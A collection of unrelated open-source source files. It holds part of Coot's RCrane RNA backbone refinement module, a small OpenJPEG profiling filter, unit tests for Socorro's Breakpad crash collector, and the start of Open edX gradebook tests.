set_monomer_restraints(curNuc, newRestraints)
return origRestraints
def __changeCootSettings():
"""Change Coot's minimization settings
ARUGMENTS:
None
RETURNS:
these values are returned so the minimization settings can be restored later
origImmediateReplaceValue - the original refinement_immediate_replacement_state() value
origRefineWithTorsionsValue - the original refine_with_torsion_restraints_state()
origWeightValue - the original matrix_state() value
origMonomerRestraints - the original monomer restraints (i.e. torsion restraints)
origUseOnlyExtraTorsionValue - the original settings for use_only_extra_torsion_restraints_for_torsions
"""
#we're going to have to change some Coot settings during the coordinate calculation
#so check what the existing values are so we can set them back
origImmediateReplaceValue = refinement_immediate_replacement_state() #don't ask the user to accept the refinement
origRefineWithTorsionsValue = refine_with_torsion_restraints_state() #whether or not we use torsional contraints
origWeightValue = matrix_state() #how much weight is placed on geometry vs. map constraints
#origNumStepsPerFrameValue = refinement_refine_per_frame_state() #how many steps of refinement occurr in between updating graphics
origUseOnlyExtraTorsionValue = use_only_extra_torsion_restraints_for_torsions_state() #should we ignore the standard torsion restraints and only use the user-defined ones
#set the values that we want
set_refinement_immediate_replacement(1)
set_refine_with_torsion_restraints(1)
set_matrix(REFINE_MAP_WEIGHT)
#dragged_refinement_steps_per_frame()
#in theory, a large value here should cause Coot to not update the graphics as it refines (which should speed up refinement)
#but Coot doesn't seem to like it when this value is too high
#and Windows thinks that Coot has frozen if it takes too long
#so we just leave this at the default
#set_use_only_extra_torsion_restraints_for_torsions(1)
set_use_only_extra_torsion_restraints_for_torsions(0)
#this function seems to entirely disable torsion restraints, which is the opposite of what it's supposed to do
#as a result, we make sure it's turned off rather than making sure it's turned on
#I should probably fix this function/flag in Coot
#remove all built-in torsional restraints from RNA nucleotides
origMonomerRestraints = __changeMonomerRestraints()
return (origImmediateReplaceValue, origRefineWithTorsionsValue, origWeightValue, origMonomerRestraints, origUseOnlyExtraTorsionValue)
def __restoreCootSettings(origCootSettings):
"""Restore Coot's minimization settings
ARGUMENTS:
origCootSettings - Coot settings to be restored (as returned by __changeCootSettings)
RETURNS:
None
"""
(origImmediateReplaceValue, origRefineWithTorsionsValue, origWeightValue, origMonomerRestraints, origUseOnlyExtraTorsionValue) = origCootSettings
set_refinement_immediate_replacement(origImmediateReplaceValue)
set_refine_with_torsion_restraints(origRefineWithTorsionsValue)
set_matrix(origWeightValue)
set_use_only_extra_torsion_restraints_for_torsions(origUseOnlyExtraTorsionValue)
for curNuc in ("A", "G", "C", "U"):
set_monomer_restraints(curNuc, origMonomerRestraints[curNuc])
def __calcRefinementScore(refinementResults):
"""Calculate an overall score for the quality of the refinement results
ARGUMENTS:
refinementResults - the output of refine_residues()
RETURNS:
overallScore - an overall refinement score based on the bond length, angles, and torsions
"""
#from pprint import pprint; pprint(refinementResults)
scoreList = refinementResults[2]
if not scoreList:
#if there is no scorelist, then Coot gave up on the minimization
#(Modifying Coot to return a score when the minimization times out is do-able, but it would slightly slow
#down all minimizations unless more significant changes to the minimizer code are made. Typically, if we've
#timed out, then something has gone wrong anyway, so simply using REFINEMENT_FAIL_SCORE is a workable solution.)
return REFINEMENT_FAIL_SCORE
overallScore = 0
for curScore in scoreList:
if curScore[0] in ["Bonds", "Angles", "Torsions"]:
#TODO: add in start_pos scores?
overallScore += curScore[2]
return overallScore
def __addPhenixRestraints(molNum, chain, prevPrevResNumFull, prevResNumFull, curResNumFull, nextResNumFull, curRot, nextRot, curResType, nextResAlreadyBuilt = False, onlyPucker = None):
"""Add angle and bond restraints for the specified nucleotides using the Phenix pucker-specific restraint values
ARGUMENTS
molNum - the Coot molecule number
chain - the chain name
prevPrevResNumFull - the residue number of residue i-2 (needed to restrain the non-bridging oxygens of residue prevResNum)
prevResNumFull - the residue number of the previous residue using Coot numbering (i.e. starting at 1, not 0)
curResNumFull - the residue number to build using Coot numbering (i.e. starting at 1, not 0)
nextResNumFull - the residue number of the next residue using Coot numbering (i.e. starting at 1, not 0)
curRot - the rotamer to use when building the current residue
nextRot - the rotamer to use when building the next residue
curResType - the residue type (i.e. A, G, C, or U) of the current residue
OPTIONAL ARGUMENTS:
nextResAlreadyBuilt - should be True if the next residue is already built (i.e. if we are being
called from recalcCoords instead of calcCoords)
Defaults to False.
onlyPucker - should only be provided if curRot and nextRot are None. This is used when we're only building
a single nucleotide, so we don't have a full suite and therefore can't predict a conformer
RETURNS:
None
"""
if curResType == "A" or curResType == "G":
glycosidicBaseAtom = " N9 "
else:
glycosidicBaseAtom = " N1 "
#figure out the sugar puckers
prevPucker = None
curPucker = None
nextPucker = None
if isinstance(curRot, basestring): #basestring includes unicode and non-unicode strings. It's overkill here, but it can't hurt:
(prevPucker, curPucker) = puckerList[curRot]
elif isinstance(curRot, list):
#if curRot is a list, then it's not really a rotamer, it's just a list of the current torsion values
#in this case, we can use delta to figure out the appropriate pucker
if curRot[0] < 114.5:
prevPucker = 3
else:
prevPucker = 2
if not isinstance(nextRot, basestring):
#if nextRot is a real rotamer, then don't bother with delta-based guesses
if curRot[6] < 114.5:
curPucker = 3
else:
curPucker = 2
if isinstance(nextRot, basestring): #basestring includes unicode and non-unicode strings. It's overkill here, but it can't hurt
#if nextRot is a rotamer
(curPucker, nextPucker) = puckerList[nextRot]
elif isinstance(nextRot, list):
#if nextRot is a list, then it's not really a rotamer, it's just a list of the current torsion values
#in this case, we can use delta to figure out the appropriate pucker
if curPucker is None:
#if we had a real rotamer for curRot, then don't overwrite it with our delta-based guess
if nextRot[0] < 114.5:
curPucker = 3
else:
curPucker = 2
if nextRot[6] < 114.5:
nextPucker = 3
else:
nextPucker = 2
#curPucker may get set twice here, but that doesn't matter, since curRot and nextRot *must* agree on their overlapping pucker
#if we don't have any conformers, then set curPucker to onlyPucker
if onlyPucker is not None and curPucker is None:
curPucker = onlyPucker
#split the residue numbers
(prevPrevResNum, prevPrevResInsCode) = __splitResNum(prevPrevResNumFull)
(prevResNum, prevResInsCode) = __splitResNum(prevResNumFull)
(curResNum, curResInsCode) = __splitResNum(curResNumFull)
(nextResNum, nextResInsCode) = __splitResNum(nextResNumFull)
#figure out the number of the residue before prevResNum
phenixRestraints.setAngleRestraints(molNum, chain, prevPrevResNum, prevResNum, curResNum, nextResNum, glycosidicBaseAtom, prevPucker, curPucker, nextPucker, nextResAlreadyBuilt)
phenixRestraints.setBondRestraints(molNum, chain, prevResNum, curResNum, nextResNum, glycosidicBaseAtom, prevPucker, curPucker, nextPucker, nextResAlreadyBuilt)
def enablePhenixRestraints():
"""Enable Phenix's pucker-specific restraints for minimization
ARGUMENTS:
None
RETURNS:
True if enabling the restraints succceeded, False otherwise
NOTE:
Phenix restraints are only available in versions of Coot newer than 3926
"""
global USE_PHENIX_RESTRAINTS
if svn_revision() >= 3926:
#Coot revision 3926 has a bug fix to fix non-bonded constraints when using extra bond and angle restraints
USE_PHENIX_RESTRAINTS = True
print "Using Phenix restraints"
return True
else:
print "Coot must be newer than 0.7-pre r3926 to use Phenix restraints. Using Coot/CCP4 restraints."
return False
def disablePhenixRestraints():
"""Disable Phenix's pucker-specific restraints for minimization and use the Coot/CCP4 restraints instead
ARGUMENTS:
None
RETURNS:
True (for consistancy with enablePhenixRestraints())
"""
global USE_PHENIX_RESTRAINTS
USE_PHENIX_RESTRAINTS = False
print "Using Coot/CCP4 restraints"
return True
def usingPhenixRestraints():
"""Check if we are using Phenix's pucker-specific restraints for minimization
ARGUMENTS:
None
RETURNS:
True if we are using Phenix restraints
False if we are using Coot/CCP4 restraints
"""
return USE_PHENIX_RESTRAINTS
def __fixEntireResidue(molNum, chain, resNumFull, atomList):
"""Fix all atoms in a residue
ARGUMENTS:
molNum - the molecule number of the residue to fix
chain - the chain of the residue to fix
resNumFull - the residue number of the residue to fix including insertion code
atomList - a list of all atoms in the specified residue
RETURNS:
None
"""
(resNum, insCode) = __splitResNum(resNumFull)
fixList = [[chain, resNum, "", curAtom, ""] for curAtom in atomList]
mark_multiple_atoms_as_fixed(molNum, fixList, 1)
def buildOnlyPhosOxy(pseudoMol, resIndex, direction = 3):
"""Build the non-bridging oxygens onto a terminal nucleotide
ARGUMENTS:
resIndex - the index of the residue to build the phosphates onto
OPTIONAL ARGUMENTS:
direction - which side of the residue to add the phosphoryl oxygens to
RETURNS:
NONE
"""
#print "In buildOnlyPhosOxy with resIndex =", resIndex
if direction == 3:
chain = pseudoMol.createPartialChainObjectFromIndex(resIndex-1, resIndex)
prevResAtoms = chain.nucleotides[0].atoms
curResAtoms = chain.nucleotides[1].atoms
else:
chain = pseudoMol.createPartialChainObjectFromIndex(resIndex, resIndex)
curResAtoms = chain.nucleotides[0].atoms
prevResAtoms = None
#from pprint import pprint
#pprint(prevResAtoms)
#pprint(curResAtoms)
phosOxyCoords = buildInitOrTerminalPhosOxy(curResAtoms, prevResAtoms)
pseudoMol.addPhosOxyFromIndex(resIndex, phosOxyCoords)
class ProgressDialogObject:
"""A class for displaying a progress dialog while calculating/minimizing backbone coordinates"""
def __init__(self, window, totalNum):
"""Initialize a ProgressDialogObject object
ARGUMENTS:
window - the window object to display the progress dialog in
if None, a new window will be created
totalNum - the total number of steps for the progress bar
akin to the deprecated set_discrete_blocks functionality
RETURNS:
an initialized ProgressDialogObject object
EFFECTS:
If provided, the contents of window are replaced by a progress bar
The contents of window can later be restored using restoreWindow()
"""
self.__window = window
self.__oldWindowSize = None
self.__oldWindowContents = None
self.__progressFracIncrement = None
self.__curProgressFrac = 0
self.__curProgressInt = 0
self.__totalNum = totalNum
self.__progressbar = None
if self.__window is not None:
windowChild = self.__window.get_child()
if windowChild is not None:
self.__oldWindowSize = window.get_size()
self.__oldWindowContents = windowChild
self.__window.remove(windowChild)
else:
self.__window = createRCraneWindowObject()
self.__createProgressDialog()
def __createProgressDialog(self):
"""Add the ProgressBar to self.__window
ARGUMENTS:
None
RETURNS:
None
"""
windowBox = gtk.VBox(False, VBOX_SPACING)
self.__window.add(windowBox)
self.__window.resize(1,1) #remove any size constraints
calculatingLabel = gtk.Label("\n Calculating backbone coordinates... \n\n Please wait... \n")
calculatingLabel.set_justify(gtk.JUSTIFY_CENTER)
windowBox.pack_start(calculatingLabel, False, False, HBOX_SPACING)
self.__progressbar = gtk.ProgressBar()
self.__progressbar.set_text("Built 0 of " + str(self.__totalNum) + " nucleotides")
progressAlign = gtk.Alignment(xscale=0.9, xalign=0.5)
progressAlign.add(self.__progressbar)
windowBox.pack_start(progressAlign, False, False, HBOX_SPACING)
self.__window.show_all()
self.__progressFracIncrement = 1.0 / (self.__totalNum)
def progress(self, step = 1):
"""Increment the progress bar
OPTIONAL ARGUMENTS:
step - how many steps to increment the progress bar by, defaults to 1
RETURNS:
None
"""
self.__curProgressFrac += (step * self.__progressFracIncrement)
self.__curProgressInt += step
#make sure __curProgressFrac isn't > 1 due to a rounding error
if self.__curProgressFrac > 1:
self.__curProgressFrac = 1
self.__progressbar.set_fraction(self.__curProgressFrac)
self.__progressbar.set_text("Built " + str(self.__curProgressInt) + " of " + str(self.__totalNum) + " nucleotides")
def restoreWindow(self):
"""Restore the original contents of the window and destroy the ProgressDialogObject object
ARGUMENTS:
None
RETURNS:
None
EFFECTS:
the original contents of the window are destroyed
the ProgressDialogObject is set to None, since it is no longer useful
"""
windowChild = self.__window.get_child()
self.__window.remove(windowChild)
if self.__oldWindowContents is not None:
self.__window.add(self.__oldWindowContents)
#set the window back to the size it was before
if self.__oldWindowSize is not None:
self.__window.resize(*self.__oldWindowSize)
#set the object to none, since it's useless now
#but don't actually call a destructor
self = None
|
jlec/coot
|
rcrane/calcCoords.py
|
Python
|
gpl-3.0
| 77,459
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017, IntoPIX SA
# Contact: support@intopix.com
# Author: Even Rouault
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS `AS IS'
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import sys
lines = open(sys.argv[1], 'rt').readlines()
display_next_lines = False
for line in lines:
line = line.replace('\n', '')
if line == 'heap_tree=peak':
display_next_lines = True
elif display_next_lines:
if line == '#-----------':
break
print(line)
|
AlienCowEatCake/ImageViewer
|
src/ThirdParty/OpenJPEG/openjpeg-2.4.0/tests/profiling/filter_massif_output.py
|
Python
|
gpl-3.0
| 1,727
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import hashlib
import StringIO
import gzip
import web
import mock
from nose.tools import eq_, ok_
from datetime import datetime
from contextlib import closing
from configman.dotdict import DotDict
from socorro.collector.wsgi_breakpad_collector import BreakpadCollector
from socorro.collector.throttler import ACCEPT, IGNORE, DEFER
from socorro.unittest.testbase import TestCase
class ObjectWithValue(object):
def __init__(self, v):
self.value = v
class TestCollectorApp(TestCase):
def get_standard_config(self):
config = DotDict()
config.logger = mock.MagicMock()
config.throttler = mock.MagicMock()
config.collector = DotDict()
config.collector.collector_class = BreakpadCollector
config.collector.dump_id_prefix = 'bp-'
config.collector.dump_field = 'dump'
config.collector.accept_submitted_crash_id = False
config.collector.accept_submitted_legacy_processing = False
config.collector.checksum_method = hashlib.md5
config.crash_storage = mock.MagicMock()
return config
def test_setup(self):
config = self.get_standard_config()
c = BreakpadCollector(config)
eq_(c.config, config)
eq_(c.logger, config.logger)
eq_(c.throttler, config.throttler)
eq_(c.crash_storage, config.crash_storage)
eq_(c.dump_id_prefix, 'bp-')
eq_(c.dump_field, 'dump')
def test_make_raw_crash(self):
config = self.get_standard_config()
form = DotDict()
form.ProductName = 'FireSquid'
form.Version = '99'
form.dump = 'fake dump'
form.some_field = '\x0023'
form.some_other_field = ObjectWithValue('XYZ')
class BreakpadCollectorWithMyForm(config.collector.collector_class):
def _form_as_mapping(self):
return form
c = BreakpadCollectorWithMyForm(config)
rc, dmp = c._get_raw_crash_from_form()
eq_(rc.ProductName, 'FireSquid')
eq_(rc.Version, '99')
eq_(rc.some_field, '23')
eq_(rc.some_other_field, 'XYZ')
@mock.patch('socorro.collector.wsgi_breakpad_collector.time')
@mock.patch('socorro.collector.wsgi_breakpad_collector.utc_now')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web.webapi')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web')
def test_POST(self, mocked_web, mocked_webapi, mocked_utc_now, mocked_time):
config = self.get_standard_config()
c = BreakpadCollector(config)
rawform = DotDict()
rawform.ProductName = '\x00FireSquid'
rawform.Version = '99'
rawform.dump = DotDict({'value': 'fake dump', 'file': 'faked file'})
rawform.aux_dump = DotDict({'value': 'aux_dump contents', 'file': 'silliness'})
rawform.some_field = '23'
rawform.some_other_field = ObjectWithValue('XYZ')
form = DotDict(rawform)
form.dump = rawform.dump.value
erc = DotDict()
erc.ProductName = 'FireSquid'
erc.Version = '99'
erc.some_field = '23'
erc.some_other_field = 'XYZ'
erc.legacy_processing = ACCEPT
erc.timestamp = 3.0
erc.submitted_timestamp = '2012-05-04T15:10:00'
erc.throttle_rate = 100
erc.dump_checksums = {
'dump': '2036fd064f93a0d086cf236c5f0fd8d4',
'aux_dump': 'aa2e5bf71df8a4730446b2551d29cb3a',
}
erc = dict(erc)
mocked_web.input.return_value = form
mocked_webapi.rawinput.return_value = rawform
mocked_utc_now.return_value = datetime(2012, 5, 4, 15, 10)
mocked_time.time.return_value = 3.0
c.throttler.throttle.return_value = (ACCEPT, 100)
r = c.POST()
ok_(r.startswith('CrashID=bp-'))
ok_(r.endswith('120504\n'))
erc['uuid'] = r[11:-1]
c.crash_storage.save_raw_crash.assert_called_with(
erc,
{'dump':'fake dump', 'aux_dump':'aux_dump contents'},
r[11:-1]
)
@mock.patch('socorro.collector.wsgi_breakpad_collector.time')
@mock.patch('socorro.collector.wsgi_breakpad_collector.utc_now')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web.webapi')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web')
def test_POST_reject_browser_with_hangid(
self,
mocked_web,
mocked_webapi,
mocked_utc_now,
mocked_time
):
config = self.get_standard_config()
c = BreakpadCollector(config)
rawform = DotDict()
rawform[u'\u0000ProductName'] = 'FireSquid'
rawform.Version = '99'
rawform.dump = DotDict({'value': 'fake dump', 'file': 'faked file'})
rawform.some_field = '23'
rawform.some_other_field = ObjectWithValue('XYZ')
rawform.HangID = 'xyz'
rawform.ProcessType = 'browser'
form = DotDict(rawform)
form.dump = rawform.dump.value
erc = DotDict()
erc.ProductName = 'FireSquid'
erc.Version = '99'
erc.some_field = '23'
erc.some_other_field = 'XYZ'
erc.legacy_processing = ACCEPT
erc.throttle_rate = None
erc.timestamp = 3.0
erc.submitted_timestamp = '2012-05-04T15:10:00'
erc = dict(erc)
mocked_webapi.rawinput.return_value = rawform
mocked_utc_now.return_value = datetime(2012, 5, 4, 15, 10)
mocked_time.time.return_value = 3.0
c.throttler.throttle.return_value = (IGNORE, None)
r = c.POST()
eq_(r, "Unsupported=1\n")
ok_(not
c.crash_storage.save_raw_crash.call_count
)
@mock.patch('socorro.collector.wsgi_breakpad_collector.time')
@mock.patch('socorro.collector.wsgi_breakpad_collector.utc_now')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web.webapi')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web')
def test_POST_with_existing_crash_id(
self,
mocked_web,
mocked_webapi,
mocked_utc_now,
mocked_time
):
config = self.get_standard_config()
c = BreakpadCollector(config)
rawform = DotDict()
rawform.ProductName = 'FireSquid'
rawform.Version = '99'
rawform.dump = DotDict({'value': 'fake dump', 'file': 'faked file'})
rawform.aux_dump = DotDict({'value': 'aux_dump contents', 'file': 'silliness'})
rawform.some_field = '23'
rawform.some_other_field = ObjectWithValue('XYZ')
rawform.uuid = '332d798f-3cx\x0042-47a5-843f-a0f892140107'
form = DotDict(rawform)
form.dump = rawform.dump.value
erc = DotDict()
erc.ProductName = 'FireSquid'
erc.Version = '99'
erc.some_field = '23'
erc.some_other_field = 'XYZ'
erc.legacy_processing = ACCEPT
erc.timestamp = 3.0
erc.submitted_timestamp = '2012-05-04T15:10:00'
erc.throttle_rate = 100
erc.dump_checksums = {
'dump': '2036fd064f93a0d086cf236c5f0fd8d4',
'aux_dump': 'aa2e5bf71df8a4730446b2551d29cb3a',
}
erc = dict(erc)
mocked_web.input.return_value = form
mocked_webapi.rawinput.return_value = rawform
mocked_utc_now.return_value = datetime(2012, 5, 4, 15, 10)
mocked_time.time.return_value = 3.0
c.throttler.throttle.return_value = (ACCEPT, 100)
r = c.POST()
ok_(r.startswith('CrashID=bp-'))
ok_(r.endswith('120504\n'))
erc['uuid'] = r[11:-1]
c.crash_storage.save_raw_crash.assert_called_with(
erc,
{'dump':'fake dump', 'aux_dump':'aux_dump contents'},
r[11:-1]
)
@mock.patch('socorro.collector.wsgi_breakpad_collector.time')
@mock.patch('socorro.collector.wsgi_breakpad_collector.utc_now')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web.webapi')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web')
def test_POST_with_existing_crash_id_and_use_it(
self,
mocked_web,
mocked_webapi,
mocked_utc_now,
mocked_time
):
config = self.get_standard_config()
config.collector.accept_submitted_crash_id = True
c = BreakpadCollector(config)
rawform = DotDict()
rawform.ProductName = 'FireSquid'
rawform.Version = '99'
rawform.dump = DotDict({'value': 'fake dump', 'file': 'faked file'})
rawform.aux_dump = DotDict({'value': 'aux_dump contents', 'file': 'silliness'})
rawform.some_field = '23'
rawform.some_other_field = ObjectWithValue('XYZ')
rawform.uuid = '332d798f-3c42-47a5-843f-a0f892140107'
rawform.legacy_processing = str(DEFER)
rawform.throttle_rate = 100
rawform.dump_checksums = "this is poised to overwrite and cause trouble"
form = DotDict(rawform)
form.dump = rawform.dump.value
erc = DotDict()
erc.ProductName = 'FireSquid'
erc.Version = '99'
erc.some_field = '23'
erc.some_other_field = 'XYZ'
erc.legacy_processing = DEFER
erc.timestamp = 3.0
erc.submitted_timestamp = '2012-05-04T15:10:00'
erc.throttle_rate = 100
erc.uuid = '332d798f-3c42-47a5-843f-a0f892140107'
erc.dump_checksums = {
'dump': '2036fd064f93a0d086cf236c5f0fd8d4',
'aux_dump': 'aa2e5bf71df8a4730446b2551d29cb3a',
}
erc = dict(erc)
mocked_web.input.return_value = form
mocked_webapi.rawinput.return_value = rawform
mocked_utc_now.return_value = datetime(2012, 5, 4, 15, 10)
mocked_time.time.return_value = 3.0
c.throttler.throttle.return_value = (DEFER, 100)
r = c.POST()
ok_(r.startswith('CrashID=bp-'))
ok_(r.endswith('140107\n'))
c.crash_storage.save_raw_crash.assert_called_with(
erc,
{'dump':'fake dump', 'aux_dump':'aux_dump contents'},
r[11:-1]
)
@mock.patch('socorro.collector.wsgi_breakpad_collector.time')
@mock.patch('socorro.collector.wsgi_breakpad_collector.utc_now')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web.webapi')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web')
def test_POST_with_existing_legacy_processing(
self,
mocked_web,
mocked_webapi,
mocked_utc_now,
mocked_time
):
config = self.get_standard_config()
c = BreakpadCollector(config)
rawform = DotDict()
rawform.ProductName = 'FireSquid'
rawform.Version = '99'
rawform.dump = DotDict({'value': 'fake dump', 'file': 'faked file'})
rawform.aux_dump = DotDict({'value': 'aux_dump contents', 'file': 'silliness'})
rawform.some_field = '23'
rawform.some_other_field = ObjectWithValue('XYZ')
rawform.uuid = '332d798f-3c42-47a5-843f-a0f892140107'
rawform.legacy_processing = u'1'
form = DotDict(rawform)
form.dump = rawform.dump.value
erc = DotDict()
erc.ProductName = 'FireSquid'
erc.Version = '99'
erc.some_field = '23'
erc.some_other_field = 'XYZ'
erc.legacy_processing = ACCEPT
erc.timestamp = 3.0
erc.submitted_timestamp = '2012-05-04T15:10:00'
erc.throttle_rate = 100
erc.dump_checksums = {
'dump': '2036fd064f93a0d086cf236c5f0fd8d4',
'aux_dump': 'aa2e5bf71df8a4730446b2551d29cb3a',
}
erc = dict(erc)
mocked_web.input.return_value = form
mocked_webapi.rawinput.return_value = rawform
mocked_utc_now.return_value = datetime(2012, 5, 4, 15, 10)
mocked_time.time.return_value = 3.0
c.throttler.throttle.return_value = (ACCEPT, 100)
r = c.POST()
ok_(r.startswith('CrashID=bp-'))
ok_(r.endswith('120504\n'))
erc['uuid'] = r[11:-1]
c.crash_storage.save_raw_crash.assert_called_with(
erc,
{'dump':'fake dump', 'aux_dump':'aux_dump contents'},
r[11:-1]
)
@mock.patch('socorro.collector.wsgi_breakpad_collector.time')
@mock.patch('socorro.collector.wsgi_breakpad_collector.utc_now')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web.webapi')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web')
def test_POST_with_existing_legacy_processing_and_use_it(
self,
mocked_web,
mocked_webapi,
mocked_utc_now,
mocked_time
):
config = self.get_standard_config()
config.collector.accept_submitted_crash_id = True
config.collector.accept_submitted_legacy_processing = True
c = BreakpadCollector(config)
rawform = DotDict()
rawform.ProductName = 'FireSquid'
rawform.Version = '99\x00'
rawform.dump = DotDict({'value': 'fake dump', 'file': 'faked file'})
rawform.aux_dump = DotDict({'value': 'aux_dump contents', 'file': 'silliness'})
rawform[u'some_field\u0000'] = '23'
rawform[u'some_\u0000other_field'] = ObjectWithValue('XYZ')
rawform.uuid = '332d798f-3c42-47a5-843f-a0f892140107'
rawform.legacy_processing = str(DEFER)
rawform.throttle_rate = 100
form = DotDict(rawform)
form.dump = rawform.dump.value
erc = DotDict()
erc.ProductName = 'FireSquid'
erc.Version = '99'
erc.some_field = '23'
erc.some_other_field = 'XYZ'
erc.legacy_processing = DEFER
erc.timestamp = 3.0
erc.submitted_timestamp = '2012-05-04T15:10:00'
erc.throttle_rate = 100
erc.uuid = '332d798f-3c42-47a5-843f-a0f892140107'
erc.dump_checksums = {
'dump': '2036fd064f93a0d086cf236c5f0fd8d4',
'aux_dump': 'aa2e5bf71df8a4730446b2551d29cb3a',
}
erc = dict(erc)
mocked_web.input.return_value = form
mocked_webapi.rawinput.return_value = rawform
mocked_utc_now.return_value = datetime(2012, 5, 4, 15, 10)
mocked_time.time.return_value = 3.0
c.throttler.throttle.return_value = (DEFER, 100)
r = c.POST()
ok_(r.startswith('CrashID=bp-'))
ok_(r.endswith('140107\n'))
c.crash_storage.save_raw_crash.assert_called_with(
erc,
{'dump':'fake dump', 'aux_dump':'aux_dump contents'},
r[11:-1]
)
@mock.patch('socorro.collector.wsgi_breakpad_collector.time')
@mock.patch('socorro.collector.wsgi_breakpad_collector.utc_now')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web.webapi')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web.ctx')
def test_POST_with_gzip(
self,
mocked_web_ctx,
mocked_webapi,
mocked_utc_now,
mocked_time
):
config = self.get_standard_config()
c = BreakpadCollector(config)
form = """
--socorro1234567
Content-Disposition: form-data; name="ProductName"
FireSquid
--socorro1234567
Content-Disposition: form-data; name="Version"
99
--socorro1234567
Content-Disposition: form-data; name="some_field"
23
--socorro1234567
Content-Disposition: form-data; name="some_other_field"
XYZ
--socorro1234567
Content-Disposition: form-data; name="dump"; filename="dump"
Content-Type: application/octet-stream
fake dump
--socorro1234567
Content-Disposition: form-data; name="aux_dump"; filename="aux_dump"
Content-Type: application/octet-stream
aux_dump contents
"""
erc = DotDict()
erc.ProductName = 'FireSquid'
erc.Version = '99'
erc.some_field = '23'
erc.some_other_field = 'XYZ'
erc.legacy_processing = ACCEPT
erc.timestamp = 3.0
erc.submitted_timestamp = '2012-05-04T15:10:00'
erc.throttle_rate = 100
erc.dump_checksums = {
'dump': '2036fd064f93a0d086cf236c5f0fd8d4',
'aux_dump': 'aa2e5bf71df8a4730446b2551d29cb3a',
}
erc = dict(erc)
with closing(StringIO.StringIO()) as s:
g = gzip.GzipFile(fileobj=s, mode='w')
g.write(form)
g.close()
gzipped_form = s.getvalue()
mocked_webapi.data.return_value = gzipped_form
mocked_web_ctx.configure_mock(
env={
'HTTP_CONTENT_ENCODING': 'gzip',
'CONTENT_ENCODING': 'gzip',
'CONTENT_TYPE':
'multipart/form-data; boundary="socorro1234567"',
'REQUEST_METHOD': 'POST'
}
)
mocked_utc_now.return_value = datetime(2012, 5, 4, 15, 10)
mocked_time.time.return_value = 3.0
c.throttler.throttle.return_value = (ACCEPT, 100)
r = c.POST()
ok_(r.startswith('CrashID=bp-'))
ok_(r.endswith('120504\n'))
erc['uuid'] = r[11:-1]
c.crash_storage.save_raw_crash.assert_called_with(
erc,
{'dump':'fake dump', 'aux_dump':'aux_dump contents'},
r[11:-1]
)
def test_no_x00_character(self):
config = self.get_standard_config()
c = BreakpadCollector(config)
eq_(c._no_x00_character('\x00hello'), 'hello')
eq_(c._no_x00_character(u'\u0000bye'), 'bye')
eq_(c._no_x00_character(u'\u0000\x00bye'), 'bye')
|
spthaolt/socorro
|
socorro/unittest/collector/test_wsgi_breakpad_collector.py
|
Python
|
mpl-2.0
| 17,622
|
"""
Tests of the instructor dashboard spoc gradebook
"""
from django.core.urlresolvers import reverse
from nose.plugins.attrib import attr
from six import text_type
from capa.tests.response_xml_factory import StringResponseXMLFactory
from courseware.tests.factories import StudentModuleFactory
from lms.djangoapps.grades.tasks import compute_all_grades_for_course
from student.tests.factories import AdminFactory, CourseEnrollmentFactory, UserFactory
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
USER_COUNT = 11
@attr(shard=1)
class TestGradebook(SharedModuleStoreTestCase):
"""
Test functionality of the spoc gradebook. Sets up a course with assignments and
students who've scored various scores on these assignments. Base class for further
gradebook tests.
"""
grading_policy = None
@classmethod
def setUpClass(cls):
super(TestGradebook, cls).setUpClass()
# Create a course with the desired grading policy (from our class attribute)
kwargs = {}
if cls.grading_policy is not None:
kwargs['grading_policy'] = cls.grading_policy
cls.course = CourseFactory.create(**kwargs)
# Now give it some content
with cls.store.bulk_operations(cls.course.id, emit_signals=False):
chapter = ItemFactory.create(
parent_location=cls.course.location,
category="sequential",
)
section = ItemFactory.create(
parent_location=chapter.location,
category="sequential",
metadata={'graded': True, 'format': 'Homework'}
)
cls.items = [
ItemFactory.create(
parent_location=section.location,
category="problem",
data=StringResponseXMLFactory().build_xml(answer='foo'),
metadata={'rerandomize': 'always'}
)
for __ in xrange(USER_COUNT - 1)
]
def setUp(self):
super(TestGradebook, self).setUp()
instructor = AdminFactory.create()
self.client.login(username=instructor.username, password='test')
